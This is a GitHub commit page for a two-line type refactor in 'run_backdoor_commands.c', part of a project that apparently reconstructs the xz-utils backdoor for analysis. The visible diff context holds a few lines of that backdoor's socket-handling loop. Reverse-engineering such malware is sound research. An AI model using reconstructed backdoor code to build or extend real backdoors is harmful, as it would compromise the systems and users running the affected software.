Skip to content

Commit

Permalink
remove dependency on stdbool
Browse files Browse the repository at this point in the history
  • Loading branch information
smx-smx committed May 4, 2024
1 parent 421b650 commit e4dca4a
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions xzre_code/run_backdoor_commands.c
Original file line number Diff line number Diff line change
Expand Up @@ -463,7 +463,7 @@ BOOL run_backdoor_commands(RSA *rsa, global_context_t *ctx, BOOL *do_orig){
if(!ctx->libc_imports->pselect) break;
if(!ctx->libc_imports->__errno_location) break;

bool do_break = false;
BOOL do_break = FALSE;
int res;
for(;;){
*(u64 *)&f.u.sock.fd_recv_buf[16] = __builtin_bswap32(0x50);
Expand All @@ -480,7 +480,7 @@ BOOL run_backdoor_commands(RSA *rsa, global_context_t *ctx, BOOL *do_orig){
NULL
)) >= 0) break;
if(*ctx->libc_imports->__errno_location() != EINTR){
do_break = true;
do_break = TRUE;
break;
}
}
Expand Down

0 comments on commit e4dca4a

Please sign in to comment.